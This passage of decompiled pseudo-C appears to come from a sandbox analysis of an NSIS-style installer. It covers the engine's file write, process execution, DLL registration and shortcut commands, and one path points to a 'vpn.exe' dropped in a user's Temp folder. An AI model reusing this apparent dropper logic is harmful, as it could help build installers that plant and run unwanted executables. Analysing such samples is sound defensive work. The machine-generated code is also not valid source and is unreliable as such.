							__eax = E004062CF(L"IfFileExists: file \"%s\" does not exist, jumping %d", __esi);
							goto L44;
						} else {
							_push(_v44);
							__eax = E004062CF(L"IfFileExists: file \"%s\" exists, jumping %d", __esi);
							goto L42;
						}
					case 0xb:
						__eax = __edx;
						__eflags = _v40;
						if(_v40 != 0) {
							__ecx =  *(0x47eb20 + __eax * 4);
							 *(0x47eb60 + __eax * 4) =  *(0x47eb20 + __eax * 4);
						} else {
							__ecx =  *(0x47eb60 + __eax * 4);
							 *(0x47eb20 + __eax * 4) =  *(0x47eb60 + __eax * 4);
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							__ecx = _v48;
							 *(0x47eb60 + _v48 * 4) = __eax;
						}
						goto L430;
					case 0xc:
						__esi = _v40;
						__esi = 0x47eb60 + _v40 * 4;
						__ecx =  *__esi;
						__eax = 0;
						__eflags = __ecx;
						__eax = 0 | __ecx == 0x00000000;
						 *__esi = __ecx;
						return __eax;
					case 0xd:
						_push( *((intOrPtr*)(0x47eb60 + __ecx * 4)));
						goto L428;
					case 0xe:
						__esi = E0040145C(__edx, 0xffffffd0);
						_a4 = E0040145C(__edx, 0xffffffdf);
						__edi = E0040145C(__edx, 0x13);
						__eax = E004062CF(L"Rename: %s", __edi);
						_pop(__ecx);
						_pop(__ecx);
						__eax = MoveFileW(__esi, _a4);
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = _v40;
							if(_v40 == 0) {
								L50:
								_push(__edi);
								_push(L"Rename failed: %s");
								goto L51;
							}
							__eax = E00406301(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L50;
							} else {
								E00406C94(__esi, _a4) = E00404F9E(0xffffffe4, 0x4100f0);
								_push(__edi);
								_push(L"Rename on reboot: %s");
								goto L52;
							}
						} else {
							_push(0x4100f0);
							_push(0xffffffe3);
							goto L10;
						}
					case 0xf:
						__esi = E0040145C(__edx, 0);
						__eax =  &_a4;
						__eax = GetFullPathNameW(__esi, 0x2004, __edi,  &_a4);
						__eflags = __eax;
						if(__eax == 0) {
							L58:
							__eax = 0;
							__eflags = 0;
							 *__edi = __ax;
							_v8 = 1;
							L59:
							__eflags = _v40 - __ebx;
							if(_v40 == __ebx) {
								__eax = GetShortPathNameW(__edi, __edi, 0x2004);
							}
							goto L430;
						}
						__eax = _a4;
						__eflags = __eax - __esi;
						if(__eax <= __esi) {
							goto L59;
						}
						__eflags =  *__eax - __bx;
						if( *__eax == __bx) {
							goto L59;
						}
						__eax = E00406301(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							goto L58;
						}
						__eax = E00406035(_a4, __eax);
						goto L59;
					case 0x10:
						__eax = E0040145C(__edx, 0xffffffff);
						__ecx =  &_a4;
						__eax = SearchPathW(0, __eax, 0, 0x2004, __esi,  &_a4);
						goto L62;
					case 0x11:
						__eax = E0040145C(__edx, 0xffffffef);
						__eax = E00405EAB(__ecx, __esi, __eax); // executed
						goto L65;
					case 0x12:
						__esi = E0040145C(__edx, 0x31);
						__eax = _v48;
						__ecx = __eax;
						__eax = __eax >> 3;
						_push(__esi);
						__eax = __eax & 0x00000002;
						__ecx = __ecx & 0x00000007;
						_push(__eax);
						_v56 = __esi;
						_a4 = __ecx;
						__eax = E004062CF(L"File: overwriteflag=%d, allowskipfilesflag=%d, name=\"%s\"", __ecx);
						__eax = E00405D51(__esi);
						_push(__esi);
						__esi = L"\"C:\\Users\\alfons\\AppData\\Local\\Temp\\New Feature\\vpn.exe\"";
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00406035(__esi, 0x4d70b0);
							__eax = lstrcatW(__eax, ??);
						} else {
							_push(__esi);
							__eax = E00406035();
						}
						__eax = E00406064(__esi);
						__edi = 0x4140f8;
						while(1) {
							__eflags = _a4 - 3;
							if(_a4 >= 3) {
								__eax = E00406301(__esi);
								__ecx = 0;
								__eflags = __eax - __ebx;
								if(__eax != __ebx) {
									__ecx =  &_v36;
									__eax =  &(__eax[0xa]);
									__eflags = __eax;
									__ecx = __eax;
								}
								_a4 = _a4 + 0xfffffffd;
								_a4 + 0xfffffffd | 0x80000000 = (_a4 + 0xfffffffd | 0x80000000) & __ecx;
								__eax =  ~((_a4 + 0xfffffffd | 0x80000000) & __ecx);
								asm("sbb eax, eax");
								__eax =  ~((_a4 + 0xfffffffd | 0x80000000) & __ecx) + 1;
								__eflags = __eax;
								_a4 = __eax;
							}
							__eflags = _a4 - __ebx;
							if(_a4 == __ebx) {
								__eax = E00405E5C(__esi);
							}
							__eax = 0;
							__eflags = _a4 - 1;
							0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
							__eax = E00405E7C(__esi, 0x40000000, (__eflags != 0) + 1);
							_v12 = __eax;
							__eflags = __eax - 0xffffffff;
							if(__eax != 0xffffffff) {
								break;
							}
							__eflags = _a4 - __ebx;
							if(_a4 != __ebx) {
								__eax = E00404F9E(0xffffffe2, _v56);
								__eflags = _a4 - 2;
								if(_a4 == 2) {
									_v8 = 1;
								}
								_push(_a4);
								_push(__esi);
								_push(L"File: skipped: \"%s\" (overwriteflag=%d)");
								goto L87;
							}
							__eax = E004062CF(L"File: error creating \"%s\"", __esi);
							_pop(__ecx);
							_pop(__ecx);
							E00406035(__edi, 0x47f000) = E00406035(0x47f000, __esi);
							E00406831(__ebx, __edi, __esi, 0x4100f0, _v28) = E00406035(0x47f000, __edi);
							_v48 = _v48 >> 3;
							__eax = E00405CCC(0x4100f0, _v48 >> 3);
							__eax = __eax - 4;
							__eflags = __eax;
							if(__eax != 0) {
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									_push(L"File: error, user cancel");
									__eax = E004062CF();
									 *0x47eb68 =  *0x47eb68 + 1;
									_pop(__ecx);
									goto L431;
								}
								_push(L"File: error, user abort");
								__eax = E004062CF();
								_pop(__ecx);
								_push(__esi);
								_push(0xfffffffa);
								L4:
								__eax = E00404F9E();
								goto L5;
							}
							_push(L"File: error, user retry");
							__eax = E004062CF();
							_pop(__ecx);
						}
						__eax = E00404F9E(0xffffffea, _v56);
						 *0x47eb94 =  *0x47eb94 + 1;
						__eax = E0040337F(_v40, _v12, __ebx, __ebx); // executed
						 *0x47eb94 =  *0x47eb94 - 1;
						__edi = __eax;
						_push(__esi);
						__eax = E004062CF(L"File: wrote %d to \"%s\"", __edi);
						__eflags = _v36.dwLowDateTime - 0xffffffff;
						if(_v36.dwLowDateTime != 0xffffffff) {
							L92:
							 &_v36 = SetFileTime(_v12,  &_v36, __ebx,  &_v36); // executed
							L93:
							__eax = FindCloseChangeNotification(_v12); // executed
							__eflags = __edi - __ebx;
							if(__edi >= __ebx) {
								goto L430;
							}
							__eflags = __edi - 0xfffffffe;
							if(__edi != 0xfffffffe) {
								__eax = E00406831(__ebx, __edi, __esi, __esi, 0xffffffee);
							} else {
								E00406831(__ebx, __edi, __esi, __esi, 0xffffffe9) = lstrcatW(__esi, _v56);
							}
							__eax = E004062CF(L"%s", __esi);
							_pop(__ecx);
							_pop(__ecx);
							_push(0x200010);
							_push(__esi);
							goto L98;
						}
						__eflags = _v36.dwHighDateTime - 0xffffffff;
						if(_v36.dwHighDateTime == 0xffffffff) {
							goto L93;
						}
						goto L92;
					case 0x13:
						__eax = E0040145C(__edx, 0);
						__esi = __eax;
						_push(__eax);
						_push(L"Delete: \"%s\"");
						goto L100;
					case 0x14:
						__eax = E0040145C(__edx, 0x31);
						__esi = __eax;
						_push(__eax);
						__eax = E004062CF(L"MessageBox: %d,\"%s\"", _v48);
						__eax = E00405CCC(__esi, _v48);
						__eflags = __eax;
						if(__eax == 0) {
							goto L67;
						}
						__eflags = __eax - _v40;
						if(__eax != _v40) {
							__eflags = __eax - _v36.dwHighDateTime;
							if(__eax != _v36.dwHighDateTime) {
								goto L430;
							}
							__eax = _v28;
							return _v28;
						}
						goto L103;
					case 0x15:
						__eax = E0040145C(__edx, 0xfffffff0);
						__esi = __eax;
						_push(__eax);
						_push(L"RMDir: \"%s\"");
						L100:
						__eax = E004062CF();
						_pop(__ecx);
						_pop(__ecx);
						__eax = E00406CC7(__eflags, __esi, _v44); // executed
						goto L430;
					case 0x16:
						__eax = E0040145C(__edx, 1);
						__eax = lstrlenW(__eax);
						goto L427;
					case 0x17:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_push(3);
						_pop(__ecx);
						_a4 = __eax;
						__edi = E00401446(__ecx);
						__eax = E0040145C(__edx, 1);
						__ecx = 0;
						_v96.hNameMappings = __eax;
						 *__esi = __cx;
						__eflags = _v40;
						if(_v40 == 0) {
							L110:
							__eax = lstrlenW(__eax);
							__eflags = __edi - __ebx;
							if(__edi >= __ebx) {
								L112:
								__eflags = __edi - __eax;
								if(__edi > __eax) {
									__edi = __eax;
								}
								_v96.hNameMappings = _v96.hNameMappings + __edi * 2;
								__eax = E00406035(__esi, _v96.hNameMappings + __edi * 2);
								__edi = _a4;
								__eflags = __edi - __ebx;
								if(__eflags != 0) {
									if(__eflags < 0) {
										__edi = __edi + lstrlenW(__esi);
										__eflags = __edi;
										if(__edi < 0) {
											__edi = __ebx;
										}
									}
									__eflags = __edi - 0x2004;
									if(__edi < 0x2004) {
										__eax = 0;
										__esi[__edi] = __ax;
									}
								}
								goto L430;
							}
							__edi = __edi + __eax;
							__eflags = __edi;
							if(__edi < 0) {
								goto L430;
							}
							goto L112;
						}
						__eflags = _a4;
						if(_a4 == 0) {
							goto L430;
						}
						goto L110;
					case 0x18:
						__esi = E0040145C(__edx, 0x20);
						_push(E0040145C(__edx, 0x31));
						_push(__esi);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime != 0) {
							__eax = lstrcmpW();
						} else {
							__eax = lstrcmpiW();
						}
						__eflags = __eax;
						if(__eax != 0) {
							goto L103;
						} else {
							goto L44;
						}
					case 0x19:
						__edi = E0040145C(__edx, 1);
						__eax = ExpandEnvironmentStringsW(__edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							L128:
							__eax = 0;
							__eflags = 0;
							_v8 = 1;
							 *__esi = __ax;
							L129:
							__eax = 0;
							__esi[0x2003] = __ax;
							goto L430;
						}
						__eflags = _v40;
						if(_v40 == 0) {
							goto L129;
						}
						__eax = lstrcmpW(__edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							goto L129;
						}
						goto L128;
					case 0x1a:
						__ecx = 0;
						__eax = E00401446(0);
						__ecx = 0;
						__ecx = 1;
						__esi = __eax;
						__eax = E00401446(1);
						__eflags = _v28;
						if(_v28 != 0) {
							__eflags = __esi - __eax;
							if(__eflags < 0) {
								L103:
								__eax = _v36.dwLowDateTime;
								return _v36.dwLowDateTime;
							}
							if(__eflags <= 0) {
								goto L44;
							}
							L133:
							__eax = _v36.dwHighDateTime;
							return _v36.dwHighDateTime;
						}
						__eflags = __esi - __eax;
						if(__eflags < 0) {
							goto L103;
						}
						if(__eflags <= 0) {
							goto L44;
						}
						goto L133;
					case 0x1b:
						__ecx = 0;
						__ecx = 1;
						__eax = E00401446(1);
						_push(2);
						_pop(__ecx);
						__edi = __eax;
						__ecx = E00401446(1);
						__eax = _v36.dwLowDateTime;
						__eflags = __eax - 0xc;
						if(__eax > 0xc) {
							L159:
							_push(__edi);
							goto L428;
						}
						switch( *((intOrPtr*)(__eax * 4 +  &M00403218))) {
							case 0:
								__edi = __edi + __ecx;
								goto L159;
							case 1:
								__edi = __edi - __ecx;
								goto L159;
							case 2:
								__edi = __edi * __ecx;
								goto L159;
							case 3:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L144;
								}
								__eax = __edi;
								asm("cdq");
								_t134 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t134;
								goto L149;
							case 4:
								__edi = __edi | __ecx;
								goto L159;
							case 5:
								__edi = __edi & __ecx;
								goto L159;
							case 6:
								__edi = __edi ^ __ecx;
								goto L159;
							case 7:
								__eax = 0;
								__eflags = __edi;
								_t139 = __edi == 0;
								__eflags = _t139;
								__eax = 0 | _t139;
								L149:
								__edi = __eax;
								goto L159;
							case 8:
								__eflags = __edi;
								if(__edi != 0) {
									goto L152;
								}
								goto L151;
							case 9:
								__eflags = __edi;
								if(__edi != 0) {
									L151:
									__eflags = __ecx - __ebx;
									if(__ecx == __ebx) {
										goto L154;
									}
									L152:
									__edi = 0;
									__edi = 1;
									goto L159;
								}
								L154:
								__edi = 0;
								goto L159;
							case 0xa:
								__eflags = __ecx;
								if(__ecx == 0) {
									L144:
									__edi = 0;
									_v8 = 1;
									goto L159;
								}
								__eax = __edi;
								asm("cdq");
								_t141 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t141;
								__edi = _t141;
								goto L159;
							case 0xb:
								__edi = __edi << __cl;
								goto L159;
							case 0xc:
								__edi = __edi >> __cl;
								goto L159;
						}
					case 0x1c:
						__eax = E0040145C(__edx, 1);
						_push(2);
						_pop(__ecx);
						__edi = __eax;
						E00401446(__ecx) = wsprintfW(__esi, __edi, __eax);
						goto L88;
					case 0x1d:
						__eax = _v40;
						__edi =  *0x40c0e0; // 0x0
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = GlobalAlloc(0x40, 0x400c); // executed
								__esi = __eax;
								_t148 =  &(__esi[2]); // 0x4
								_t148 = E00406831(__ebx, __edi, __esi, _t148, _v48);
								__eax =  *0x40c0e0; // 0x0
								 *__esi = __eax;
								 *0x40c0e0 = __esi;
								goto L430;
							}
							__eflags = __edi;
							if(__edi != 0) {
								_t146 = __edi + 4; // 0x4
								_t146 = E00406035(__esi, _t146);
								__eax =  *__edi;
								 *0x40c0e0 =  *__edi;
								_push(__edi);
								goto L220;
							}
							_push(L"Pop: stack empty");
							__eax = E004062CF();
							_pop(__ecx);
							goto L67;
						} else {
							goto L162;
						}
						while(1) {
							L162:
							__eax = __eax - 1;
							__eflags = __edi - __ebx;
							if(__edi == __ebx) {
								break;
							}
							__edi =  *__edi;
							__eflags = __eax - __ebx;
							if(__eax != __ebx) {
								continue;
							}
							__eflags = __edi - __ebx;
							if(__edi != __ebx) {
								__edi = __edi + 4;
								__esi = L"\"C:\\Users\\alfons\\AppData\\Local\\Temp\\New Feature\\vpn.exe\"";
								__eax = E00406035(__esi, __edi);
								__eax =  *0x40c0e0; // 0x0
								__eax = E00406035(__edi, __eax);
								__eax =  *0x40c0e0; // 0x0
								_push(__esi);
								_push(__eax);
								goto L386;
							}
							break;
						}
						__eax = E004062CF(L"Exch: stack < %d elements", _v40);
						_pop(__ecx);
						_pop(__ecx);
						goto L166;
					case 0x1e:
						_push(3);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_push(4);
						_pop(__ecx);
						_v56 = __eax;
						__eax = E00401446(__ecx);
						__eflags = _v28 & 0x00000001;
						_a4 = __eax;
						if((_v28 & 0x00000001) != 0) {
							_v56 = E0040145C(__edx, 0x33);
						}
						__eflags = _v28 & 0x00000002;
						if((_v28 & 0x00000002) != 0) {
							_a4 = E0040145C(__edx, 0x44);
						}
						__eflags = _v52 - 0x21;
						if(_v52 != 0x21) {
							__edi = E0040145C(__edx, 1);
							__eax = E0040145C(__edx, 0x12);
							 *__eax & 0x0000ffff =  ~( *__eax & 0x0000ffff);
							asm("sbb ecx, ecx");
							__ecx =  ~( *__eax & 0x0000ffff) & __eax;
							 *__edi & 0x0000ffff =  ~( *__edi & 0x0000ffff);
							asm("sbb eax, eax");
							__eax =  ~( *__edi & 0x0000ffff) & __edi;
							__eflags = __eax;
							__eax = FindWindowExW(_v56, _a4, __eax, __ecx);
							goto L182;
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							_push(2);
							_pop(__ecx);
							__edi = __eax;
							__eax = E00401446(1);
							__ecx = _v28;
							__ecx = _v28 >> 2;
							__eflags = __ecx - __ebx;
							if(__ecx == __ebx) {
								__eax = SendMessageW(__edi, __eax, _v56, _a4);
								L182:
								_v12 = __eax;
								L183:
								__eflags = _v48 - __ebx;
								if(_v48 < __ebx) {
									goto L430;
								}
								_push(_v12);
								goto L428;
							}
							__edx =  &_v12;
							__eax = SendMessageTimeoutW(__edi, __eax, _v56, _a4, __ebx, __ecx,  &_v12);
							__eax =  ~__eax;
							asm("sbb eax, eax");
							_v8 = __eax;
							goto L183;
						}
					case 0x1f:
						__ecx = 0;
						__eax = E00401446(0);
						__eax = IsWindow(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							L44:
							__eax = _v40;
							return _v40;
						}
						L42:
						__eax = _v44;
						return _v44;
					case 0x20:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						__ecx = 0;
						__ecx = 1;
						__eax = E00401446(1);
						__eax = GetDlgItem(__eax, __eax);
						goto L427;
					case 0x21:
						 *0x47eae8 =  *0x47eae8;
						__ecx = 0;
						E00401446(0) = SetWindowLongW(__eax, 0xffffffeb,  *0x47eae8);
						goto L430;
					case 0x22:
						__esi = GetDlgItem(_v16, __ecx);
						 &(_v96.pTo) = GetClientRect(__esi,  &(_v96.pTo));
						_v96.hNameMappings = _v96.hNameMappings * _v40;
						_v96.fAnyOperationsAborted = _v96.fAnyOperationsAborted * _v40;
						__eax = E0040145C(__edx, 0);
						__eax = LoadImageW(0, __eax, 0, _v96.fAnyOperationsAborted * _v40, _v96.hNameMappings * _v40, 0x10);
						__eax = SendMessageW(__esi, 0x172, 0, __eax);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = DeleteObject(__eax);
						}
						goto L430;
					case 0x23:
						_push(0x48);
						__eax = GetDC(_v16);
						_push(__eax);
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						__eax = MulDiv(__eax, ??, ??);
						_push(3);
						__eax =  ~__eax;
						_pop(__ecx);
						0x420110->lfHeight = __eax;
						 *0x420120 = E00401446(__ecx);
						__al = _v36.dwHighDateTime;
						__al = __al & 0x00000001;
						 *0x420124 = __al & 0x00000001;
						__cl = __al;
						__cl = __al & 0x00000002;
						__al = __al & 0x00000004;
						 *0x420125 = __cl;
						 *0x420126 = __al;
						 *0x420127 = 1;
						__eax = E00406831(__ebx, __edi, __esi, 0x42012c, _v44);
						__eax = CreateFontIndirectW(0x420110);
						goto L427;
					case 0x24:
						__ecx = 0;
						__eax = E00401446(0);
						__ecx = 0;
						__ecx = 1;
						__esi = __eax;
						__edi = E00401446(1);
						__eflags = _v40;
						if(_v40 != 0) {
							_push(L"HideWindow");
							__eax = E004062CF();
							_pop(__ecx);
						}
						_push(__edi);
						_push(__esi);
						__eflags = _v36.dwLowDateTime - __ebx;
						if(_v36.dwLowDateTime != __ebx) {
							__eax = EnableWindow();
						} else {
							__eax = ShowWindow();
						}
						goto L430;
					case 0x25:
						__esi = E0040145C(__edx, 0);
						__ebx = E0040145C(__edx, 0x31);
						__edi = E0040145C(__edx, 0x22);
						E0040145C(__edx, 0x15) = E00404F9E(0xffffffec, 0x4100f0);
						 *__edi & 0x0000ffff =  ~( *__edi & 0x0000ffff);
						asm("sbb eax, eax");
						 ~( *__edi & 0x0000ffff) & __edi =  *__esi & 0x0000ffff;
						__eax =  ~( *__esi & 0x0000ffff);
						asm("sbb eax, eax");
						__eax =  ~( *__esi & 0x0000ffff) & __esi;
						__eax = ShellExecuteW(_v16,  ~( *__esi & 0x0000ffff) & __esi, __ebx,  ~( *__edi & 0x0000ffff) & __edi, 0x4d70b0, _v36.dwLowDateTime);
						__eflags = __eax - 0x21;
						if(__eax >= 0x21) {
							_push(__edi);
							_push(__ebx);
							__eax = E004062CF(L"ExecShell: success (\"%s\": file:\"%s\" params:\"%s\")", __esi);
							goto L430;
						}
						_push(__eax);
						_push(__edi);
						_push(__ebx);
						__eax = E004062CF(L"ExecShell: warning: error (\"%s\": file:\"%s\" params:\"%s\")=%d", __esi);
						goto L67;
					case 0x26:
						__esi = E0040145C(__edx, 0);
						__eax = E004062CF(L"Exec: command=\"%s\"", __esi);
						_pop(__ecx);
						_pop(__ecx);
						__eax = E00404F9E(0xffffffeb, __esi);
						__eax = E00405C6B(__esi); // executed
						_a4 = __eax;
						_push(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							_push(L"Exec: failed createprocess (\"%s\")");
							L51:
							_v8 = 1;
							goto L52;
						}
						_push(L"Exec: success (\"%s\")");
						__eax = E004062CF();
						_pop(__ecx);
						_pop(__ecx);
						__eflags = _v40;
						if(_v40 == 0) {
							L209:
							_push(_a4);
							goto L313;
						}
						__esi = WaitForSingleObject;
						while(1) {
							__eax = WaitForSingleObject(_a4, 0x64);
							__eflags = __eax - 0x102;
							if(__eax != 0x102) {
								break;
							}
							__eax = E0040635E(0xf);
						}
						 &_v20 = GetExitCodeProcess(_a4,  &_v20);
						__eflags = _v44 - __ebx;
						if(_v44 < __ebx) {
							__eflags = _v20 - __ebx;
							if(_v20 != __ebx) {
								_v8 = 1;
							}
						} else {
							__eax = E00405F7D(__edi, _v20);
						}
						goto L209;
					case 0x27:
						__eax = E0040145C(__edx, 2);
						__eax = E00406301(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = 0;
							 *__esi = __ax;
							 *__edi = __ax;
							goto L67;
						}
						__ebx = __eax;
						__eax = E00405F7D(__edi,  *((intOrPtr*)(__ebx + 0x14)));
						_push( *((intOrPtr*)(__ebx + 0x18)));
						goto L428;
					case 0x28:
						__eax = E0040145C(__edx, 0xffffffee);
						__ecx =  &_v24;
						_v96.hNameMappings = __eax;
						__eax = GetFileVersionInfoSizeW(__eax,  &_v24);
						__ecx = 0;
						 *__esi = __cx;
						_v20 = __eax;
						 *__edi = __cx;
						_v8 = 1;
						__eflags = __eax;
						if(__eax == 0) {
							goto L430;
						}
						__eax = GlobalAlloc(0x40, __eax);
						_a4 = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L430;
						}
						__eax = GetFileVersionInfoW(_v96.hNameMappings, 0, _v20, __eax);
						__eflags = __eax;
						if(__eax != 0) {
							 &(_v96.hNameMappings) =  &_v12;
							__eax = VerQueryValueW(_a4, "\\",  &_v12,  &(_v96.hNameMappings));
							__eflags = __eax;
							if(__eax != 0) {
								_v12 = E00405F7D(__esi,  *((intOrPtr*)(_v12 + 8)));
								_v12 = E00405F7D(__edi,  *((intOrPtr*)(_v12 + 0xc)));
								_v8 = 0;
							}
						}
						goto L219;
					case 0x29:
						__edi = E0040145C(__edx, 0x11);
						__eax = E00407224(__eflags, __edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							_v8 = 1;
						}
						_push(__esi);
						_push(__edi);
						_push(L"GetTTFVersionString(%s) returned %s");
						goto L87;
					case 0x2a:
						__edi = E0040145C(__edx, 0x11);
						__eax = E00407296(__edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							_v8 = 1;
						}
						_push(__esi);
						_push(__edi);
						_push(L"GetTTFFontName(%s) returned %s");
						goto L87;
					case 0x2b:
						_v8 = 1;
						__eflags =  *0x47eb98;
						if( *0x47eb98 < 0) {
							__eax = E00404F9E(0xffffffe7, 0x4100f0);
							_push(L"Error registering DLL: Could not initialize OLE");
							L26:
							__eax = E004062CF();
							goto L27;
						}
						__edi = E0040145C(__edx, 0xfffffff0);
						_v12 = E0040145C(__edx, 1);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime == 0) {
							L230:
							__eax = LoadLibraryExW(__edi, __ebx, 8); // executed
							_a4 = __eax;
							__eflags = __eax - __ebx;
							if(__eax == __ebx) {
								__eax = E00404F9E(0xfffffff6, 0x4100f0);
								_push(__edi);
								_push(L"Error registering DLL: Could not load %s");
								goto L52;
							}
							L231:
							__esi = E00406391(_a4, _v12);
							__eflags = __esi - __ebx;
							if(__esi == __ebx) {
								__eax = E00404F9E(0xfffffff7, _v12);
								_push(__edi);
								__eax = E004062CF(L"Error registering DLL: %s not found in %s", _v12);
							} else {
								_v8 = __ebx;
								__eflags = _v40 - __ebx;
								if(_v40 == __ebx) {
									_push("`�G");
									_push(0x40c0e0);
									_push(0x47f000);
									_push(0x2004);
									_push(_v16);
									__eax =  *__esi(); // executed
									__esp = __esp + 0x14;
								} else {
									__eax = E00401435(_v40);
									__eax =  *__esi();
									__eflags = __eax;
									if(__eax != 0) {
										_v8 = 1;
									}
								}
							}
							__eflags = _v36.dwLowDateTime - __ebx;
							if(_v36.dwLowDateTime == __ebx) {
								__eax = E00403CE4(_a4);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = FreeLibrary(_a4);
								}
							}
							goto L430;
						}
						__eax = GetModuleHandleW(__edi); // executed
						_a4 = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							goto L231;
						}
						goto L230;
					case 0x2c:
						_v16 = E0040145C(__edx, 0xfffffff0);
						__edi = E0040145C(__edx, 0xffffffdf);
						_v12 = E0040145C(__edx, 2);
						_v20 = E0040145C(__edx, 0xffffffcd);
						_v96.hNameMappings = E0040145C(__edx, 0x45);
						__eax = E00405D51(__edi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040145C(__edx, 0x21);
						}
						__eax = _v36.dwHighDateTime;
						__eax = __eax >> 0x10;
						_push(__eax >> 0x10);
						__eax = __eax >> 8;
						__esi = 0xff;
						__ecx = __eax >> 0x00000008 & 0x000000ff;
						_push(__eax >> 0x00000008 & 0x000000ff);
						_push(__eax);
						_push(_v20);
						_push(_v12);
						_push(__edi);
						__eax = E004062CF(L"CreateShortCut: out: \"%s\", in: \"%s %s\", icon: %s,%d, sw=%d, hk=%d", _v16);
						__eax =  &_a4;
						_push(__eax);
						_push(0x40ac10);
						_push(1);
						_push(__ebx);
						_push(0x40ac30);
						__imp__CoCreateInstance();
						__eflags = __eax - __ebx;
						if(__eax < __ebx) {
							L254:
							_push(0x4100f0);
							_v8 = 1;
							_push(0xfffffff0);
							goto L10;
						} else {
							__eax = _a4;
							__ecx =  *__eax;
							__edx =  &_v24;
							_push( &_v24);
							_push(0x40ac20);
							_push(__eax);
							__eax =  *( *__eax)();
							_v56 = __eax;
							__eflags = __eax - __ebx;
							if(__eax >= __ebx) {
								__eax = _a4;
								__ecx =  *__eax;
								_push(__edi);
								_push(__eax);
								_v56 = __eax;
								__eax = _a4;
								__ecx =  *__eax;
								_push(0x4d70b0);
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x24))();
								__ecx = _v36.dwHighDateTime;
								__ecx = __ecx >> 8;
								__eax = __ecx >> 0x00000008 & 0x000000ff;
								__eflags = __eax;
								if(__eax != 0) {
									__ecx = _a4;
									__edx =  *__ecx;
									_push(__eax);
									_push(__ecx);
									__eax =  *((intOrPtr*)( *__ecx + 0x3c))();
									__ecx = _v36.dwHighDateTime;
								}
								__eax = _a4;
								__edx =  *__eax;
								_push(__ecx);
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x34))();
								__eax = _v20;
								__eflags =  *__eax - __bx;
								if( *__eax != __bx) {
									__edi = _v36.dwHighDateTime;
									__ecx = _a4;
									__edx =  *__ecx;
									__edi = _v36.dwHighDateTime & __esi;
									__eflags = __edi;
									_push(__edi);
									_push(__eax);
									_push(__ecx);
									__eax =  *((intOrPtr*)( *__ecx + 0x44))();
								}
								__eax = _a4;
								_push(_v12);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
								__eax = _a4;
								_push(_v96.hNameMappings);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
								__eflags = _v56 - __ebx;
								if(_v56 >= __ebx) {
									__eax = _v24;
									__ecx =  *__eax;
									_push(1);
									_push(_v16);
									_push(__eax);
									_v56 = __eax;
								}
								__eax = _v24;
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 8))();
							}
							__eax = _a4;
							__ecx =  *__eax;
							_push(__eax);
							__eax =  *((intOrPtr*)( *__eax + 8))();
							__eflags = _v56 - __ebx;
							if(_v56 >= __ebx) {
								_push(0x4100f0);
								_push(0xfffffff4);
								L10:
								__eax = E00404F9E();
								goto L430;
							} else {
								goto L254;
							}
						}
					case 0x2d:
						__esi = E0040145C(__edx, 0);
						__edi = E0040145C(__edx, 0x11);
						__eax = E0040145C(__edx, 0x23);
						_push(__edi);
						_a4 = __eax;
						__eax = E004062CF(L"CopyFiles \"%s\"->\"%s\"", __esi);
						__eax = E00406301(__esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = _v16;
							_v96.hwnd = _v16;
							_v96.wFunc = 2;
							__eax = lstrlenW(__esi);
							__ecx = 0;
							 *(__esi + 2 + __eax * 2) = __cx;
							__eax = lstrlenW(__edi);
							__ecx = 0;
							 *(__edi + 2 + __eax * 2) = __cx;
							__eax = _a4;
							__cx = _v40;
							_v96.pFrom = __esi;
							_v96.pTo.left = __edi;
							_v70 = _a4;
							_v96.fFlags = _v40;
							E00404F9E(0, _a4) =  &_v96;
							__eax = SHFileOperationW( &_v96);
							__eflags = __eax;
							if(__eax == 0) {
								goto L430;
							}
						}
						__eax = E00404F9E(0xfffffff9, __ebx);
						goto L67;
					case 0x2e:
						__eflags = __edx - 0xbadf00d;
						if(__edx != 0xbadf00d) {
							L166:
							_push(0x200010);
							_push(E00406831(__ebx, __edi, __esi, __ebx, 0xffffffe8));
							L98:
							__eax = E00405CCC();
							L5:
							__eax = 0x7fffffff;
							return 0x7fffffff;
						}
						 *0x47eb74 =  *0x47eb74 + 1;
						goto L430;
					case 0x2f:
						__esi = 0x4100f0;
						_v20 = 0;
						_v24 = 0;
						_a4 = 0;
						__eax = E00406035(0x4100f0, L"<RM>");
						__edi = 0x4140f8;
						__eax = E00406035(0x4140f8, 0x4100f0);
						__eflags = _v48;
						if(_v48 != 0) {
							_v20 = E0040145C(__edx, 0);
						}
